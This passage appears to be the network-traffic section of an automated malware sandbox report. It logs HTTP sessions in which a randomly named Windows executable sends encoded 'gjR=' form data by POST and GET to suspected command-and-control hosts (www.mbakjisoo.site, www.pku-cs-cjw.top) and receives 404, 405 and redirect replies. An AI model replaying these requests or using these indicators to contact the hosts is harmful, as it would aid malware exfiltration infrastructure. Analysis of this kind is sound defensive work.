Jan 10, 2025 18:04:45.239418983 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 17:04:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49981	172.96.187.60	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:47.177798033 CET	1854	OUT	POST /s7cs/ HTTP/1.1 Host: www.mbakjisoo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mbakjisoo.site Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1240 Referer: http://www.mbakjisoo.site/s7cs/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 53 57 73 52 51 51 48 72 6b 46 4e 2b 33 6c 35 57 63 6e 55 4c 53 62 6a 75 33 53 48 53 74 73 38 39 38 79 51 4d 45 4e 6c 32 67 76 4a 2b 75 77 77 4a 74 55 67 70 32 65 5a 6e 51 4d 6e 37 4f 67 41 61 4b 4a 56 5a 36 39 6e 76 48 73 42 2b 31 53 6e 48 2f 64 59 64 6d 2f 51 64 5a 67 51 54 7a 54 4f 33 79 54 50 52 52 75 57 57 4b 66 2f 76 68 63 47 4b 4b 59 4c 4d 61 68 76 61 73 65 74 6c 4c 4a 6e 73 49 54 30 78 58 75 62 53 46 44 34 63 39 41 33 68 5a 4d 78 6d 69 2b 39 4d 6c 42 71 4c 57 6a 46 74 51 4d 65 50 45 75 46 63 42 64 4a 6a 34 48 75 61 76 4e 51 6e 34 6c 75 7a 4d 77 67 43 74 47 69 42 2b 31 6c 72 4b 78 6c 7a 30 53 38 4c 59 38 46 35 72 66 61 49 74 63 43 62 66 4b 76 70 6d 79 35 74 78 62 36 4d 6d 6c 31 33 6c 70 46 65 53 6f 68 76 5a 5a 76 59 62 6e 72 72 43 39 35 35 68 45 2f 71 4e 74 4e 58 73 67 64 6e 36 72 71 47 79 4f 64 64 52 74 41 55 72 4b 54 50 57 38 32 30 31 35 6a 64 68 4a 75 47 33 2f 73 70 58 4f 58 44 34 6a 70 34 33 65 45 46 64 77 38 62 4b 6d 78 61 2b 58 67 43 4e 62 [TRUNCATED] Data Ascii: gjR=aDmdZf0q1uw1SWsRQQHrkFN+3l5WcnULSbju3SHSts898yQMENl2gvJ+uwwJtUgp2eZnQMn7OgAaKJVZ69nvHsB+1SnH/dYdm/QdZgQTzTO3yTPRRuWWKf/vhcGKKYLMahvasetlLJnsIT0xXubSFD4c9A3hZMxmi+9MlBqLWjFtQMePEuFcBdJj4HuavNQn4luzMwgCtGiB+1lrKxlz0S8LY8F5rfaItcCbfKvpmy5txb6Mml13lpFeSohvZZvYbnrrC955hE/qNtNXsgdn6rqGyOddRtAUrKTPW82015jdhJuG3/spXOXD4jp43eEFdw8bKmxa+XgCNbKn/J98tTYDla2roKjqq8FodnEWto4op1yLS7fjx4rOdfDplLWg4ypU8oZWOizi/16Rv5TmQYv5mDm8sEayQCmxyFRrFfg0iLAFdissN5yZFQLvSDRAhVMAbrPHifs1yyfgUm55mZDUMRG6X8uDyqR8RVJtymeY/lsP3OmrJA2/CfY3TCOTFE69K1h4ziS54t22YB6raY32T3nayIbYex6YZo8BnOwJ8XR1QC4jQzFavy5oI14iUo4+yg/uOwfszUQRuYFmDdNfm7wLXD796sktEpTR+NxaukBxS3WG2cQOA5DGSm/OSkN+6h15cUxzwaaffc47vnvA0YbP1fWDtvnLIILTSkF85LQCIljapcN7mWY8j6yqiUKrUUYb1D7azrG2k5HHcYmjUIwFL/CN0heY9MmKkuPRc6/CGIXRPHjNVU9jP/mKEkot33uN+/jwwF13VZv5Ay8zwMBIVAWFzFrz3ZDJvrACXxZqF2bjJ5R/JRx5AabHbAN9XrYRRtLRGCoG1U1iA4jWBYOkgc07sw32DQnQSiFQmcuiqK2B4ZkCf4W/a6muM63xZ+R/ZjXhEVhB6ExTizKC/sg8PbNHD/nfWqKqa3urhZg1+KXcYfkiZ2SVaZLSmNEljyI/peJ/1GR6im1TZC4+7fan0fsDVXRGMT5E8EVxYUDB [TRUNCATED]
Jan 10, 2025 18:04:47.652982950 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 17:04:47 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49982	172.96.187.60	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:49.720448971 CET	550	OUT	GET /s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn HTTP/1.1 Host: www.mbakjisoo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Jan 10, 2025 18:04:50.155373096 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 17:04:50 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49983	185.199.108.153	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:55.987482071 CET	817	OUT	POST /o8v1/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pku-cs-cjw.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 Referer: http://www.pku-cs-cjw.top/o8v1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 48 4b 79 46 37 67 79 52 57 44 59 35 32 31 46 47 58 44 61 6a 56 52 37 69 42 73 72 6c 73 61 78 30 42 2b 79 6f 78 76 64 38 36 7a 73 6f 4f 55 66 48 76 79 66 79 49 75 71 78 67 35 76 59 52 75 76 31 7a 72 39 74 79 73 7a 52 76 33 79 38 30 30 4c 39 4d 43 59 6b 55 4b 59 41 67 2b 78 4c 44 35 4b 55 61 46 69 6f 55 44 63 41 37 61 65 67 4d 32 44 77 58 5a 6e 33 31 56 32 41 49 76 53 31 6b 31 6f 66 4f 42 55 73 31 63 38 55 49 62 49 7a 67 42 68 56 50 6e 65 2b 6b 48 36 2f 75 6e 6d 62 44 7a 2b 67 63 2f 6d 65 74 67 70 68 6d 54 6d 64 68 5a 50 6b 49 63 74 51 53 35 49 65 38 35 38 3d Data Ascii: gjR=XDpQ8nIPx5UCHKyF7gyRWDY521FGXDajVR7iBsrlsax0B+yoxvd86zsoOUfHvyfyIuqxg5vYRuv1zr9tyszRv3y800L9MCYkUKYAg+xLD5KUaFioUDcA7aegM2DwXZn31V2AIvS1k1ofOBUs1c8UIbIzgBhVPne+kH6/unmbDz+gc/metgphmTmdhZPkIctQS5Ie858=
Jan 10, 2025 18:04:56.433792114 CET	488	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 17:04:56 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740039-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736528696.388390,VS0,VE0 X-Fastly-Request-ID: 3f578f8748d41f8871147b93357460133418d537 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49984	185.199.108.153	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:58.536694050 CET	837	OUT	POST /o8v1/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pku-cs-cjw.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 Referer: http://www.pku-cs-cjw.top/o8v1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 56 2b 32 46 35 47 36 52 51 6a 5a 4c 7a 31 46 47 63 6a 61 76 56 52 48 69 42 74 76 31 74 73 70 30 42 65 43 6f 2b 4f 64 38 37 7a 73 6f 57 45 66 43 73 43 66 44 49 76 57 66 67 39 76 59 52 75 72 31 7a 70 31 74 79 66 61 6a 73 48 79 2b 74 6b 4c 7a 54 53 59 6b 55 4b 59 41 67 2b 6c 74 44 35 53 55 61 55 79 6f 4f 68 30 50 36 61 65 76 61 6d 44 77 54 5a 6e 7a 31 56 33 6c 49 75 50 39 6b 33 67 66 4f 45 6f 73 32 4a 63 54 44 62 49 31 2b 78 67 33 44 55 43 7a 71 31 71 58 74 48 6a 6f 59 6a 75 6f 51 70 58 30 33 43 68 4a 31 7a 4b 6c 78 4b 48 54 5a 73 4d 35 49 61 59 75 69 75 6f 43 77 79 78 79 43 32 31 4b 4c 5a 6b 75 5a 77 56 69 69 70 50 71 Data Ascii: gjR=XDpQ8nIPx5UCV+2F5G6RQjZLz1FGcjavVRHiBtv1tsp0BeCo+Od87zsoWEfCsCfDIvWfg9vYRur1zp1tyfajsHy+tkLzTSYkUKYAg+ltD5SUaUyoOh0P6aevamDwTZnz1V3lIuP9k3gfOEos2JcTDbI1+xg3DUCzq1qXtHjoYjuoQpX03ChJ1zKlxKHTZsM5IaYuiuoCwyxyC21KLZkuZwViipPq
Jan 10, 2025 18:04:58.975395918 CET	488	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 17:04:58 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890094-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736528699.931605,VS0,VE0 X-Fastly-Request-ID: d5756037b59af24ec5ad8b8fb1e1ca9a164e470a Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49985	185.199.108.153	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:05:01.083332062 CET	1854	OUT	POST /o8v1/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pku-cs-cjw.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 1240 Referer: http://www.pku-cs-cjw.top/o8v1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 56 2b 32 46 35 47 36 52 51 6a 5a 4c 7a 31 46 47 63 6a 61 76 56 52 48 69 42 74 76 31 74 73 68 30 42 76 69 6f 78 4a 4a 38 71 44 73 6f 66 6b 66 44 73 43 66 6b 49 75 2b 54 67 39 69 6c 52 74 66 31 68 63 35 74 30 75 61 6a 33 33 79 2b 77 30 4c 79 4d 43 5a 38 55 4b 49 45 67 39 64 74 44 35 53 55 61 57 61 6f 41 6a 63 50 34 61 65 67 4d 32 44 30 58 5a 6e 58 31 52 62 54 49 75 61 66 6c 47 41 66 4f 6b 59 73 30 36 30 54 41 37 49 33 2f 78 67 52 44 55 50 7a 71 31 32 39 74 45 2f 43 59 68 4f 6f 56 59 6d 39 6b 68 35 77 70 41 65 35 2b 4c 65 32 46 4c 38 31 4f 5a 67 45 68 74 63 67 7a 32 31 79 45 69 52 49 45 59 64 6e 48 48 42 35 69 65 71 71 74 65 4d 65 6c 39 4b 66 4e 65 7a 69 6e 64 45 79 6f 30 39 72 67 69 64 2b 73 6b 51 32 44 36 59 35 51 50 33 6d 79 51 74 37 62 70 6d 52 74 50 7a 32 53 6d 70 67 2f 70 48 72 64 65 63 36 53 68 46 37 63 72 2f 6f 42 64 78 37 62 74 53 35 34 2b 4f 53 50 49 6b 52 48 31 48 73 33 74 58 34 56 4b 4f 52 4b 44 59 4f 64 61 4a 38 46 36 6e 58 54 47 73 53 2f 79 [TRUNCATED] Data Ascii: gjR=XDpQ8nIPx5UCV+2F5G6RQjZLz1FGcjavVRHiBtv1tsh0BvioxJJ8qDsofkfDsCfkIu+Tg9ilRtf1hc5t0uaj33y+w0LyMCZ8UKIEg9dtD5SUaWaoAjcP4aegM2D0XZnX1RbTIuaflGAfOkYs060TA7I3/xgRDUPzq129tE/CYhOoVYm9kh5wpAe5+Le2FL81OZgEhtcgz21yEiRIEYdnHHB5ieqqteMel9KfNezindEyo09rgid+skQ2D6Y5QP3myQt7bpmRtPz2Smpg/pHrdec6ShF7cr/oBdx7btS54+OSPIkRH1Hs3tX4VKORKDYOdaJ8F6nXTGsS/yi1bn9TpTKKQj1DNqqK8HhdSBJ61N098chlORgMaAOqt/bK+h6y9PO6mkj84oFCa0qDqGDyJ6AgnS4Ko6AaT/mEnxzvG5swqJAga51GjYwbcJ1Od794oS17WNOGqh8vPyN1L5OweRW3/RojpE8msLNDfHa84EGZdKXaQcYx6DC4fVTannwKoT2fXRaZLq1LQfWS4Fc+lkgwOx4s8+Ly7ipIv3zUVgkR/t6OIF4NTXcCkZmOgvtp/S/yFLwQTz5+HrWJlHjie/vV/nqz4ZWxy+0lwe9MxJ/e7E+ppFnaYu49QDD2gEHTxeTgId1Zvh1DOtf8oKGb11vosY/rz8EiJefocXUYDBqpsg2h0FoyxYvbJ9RIfXDU2qQaZiUqpIMLIBhKG0yixhTOtm6vJZ83sLsuI8OmCEhMQuqIoxVapmQgdbjpAJtEQyFuYWchctn+FS1vGSs17LYMSkjU1Hi8r5rsEUybY2AQnUXWsepUtS30JHoZ8oqgFZnYFi7zophUGqrqTa3e9ovwE0r0p4Q8FLsbNds75SDwccM2lW/+LSvM+GF3Ezwi/51bE3Dtr+eZlJng/FzNG0lGXgOm0cENQqva3fyx3L1XMcDCEh/aer615HqscVC+wbgC/PA5eYobjCxBLIhwLAw9lNtEfdILA5qSY2gj5u7Omohf [TRUNCATED]
Jan 10, 2025 18:05:01.540545940 CET	488	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 17:05:01 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740041-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736528701.493160,VS0,VE0 X-Fastly-Request-ID: 57dbb5841e441b94ee97274ee510fccdae437873 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49986	185.199.108.153	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:05:03.629528999 CET	550	OUT	GET /o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Jan 10, 2025 18:05:04.096872091 CET	805	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 162 Server: GitHub.com Content-Type: text/html X-GitHub-Request-Id: 2444:264E2D:D980F0:EA6A31:6781533F Accept-Ranges: bytes Age: 0 Date: Fri, 10 Jan 2025 17:05:04 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740038-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736528704.040004,VS0,VE10 Vary: Accept-Encoding X-Fastly-Request-ID: 798c82793db5df2cceabfba5a3e97f9193be3bc5 Location: http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49987	104.21.64.1	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
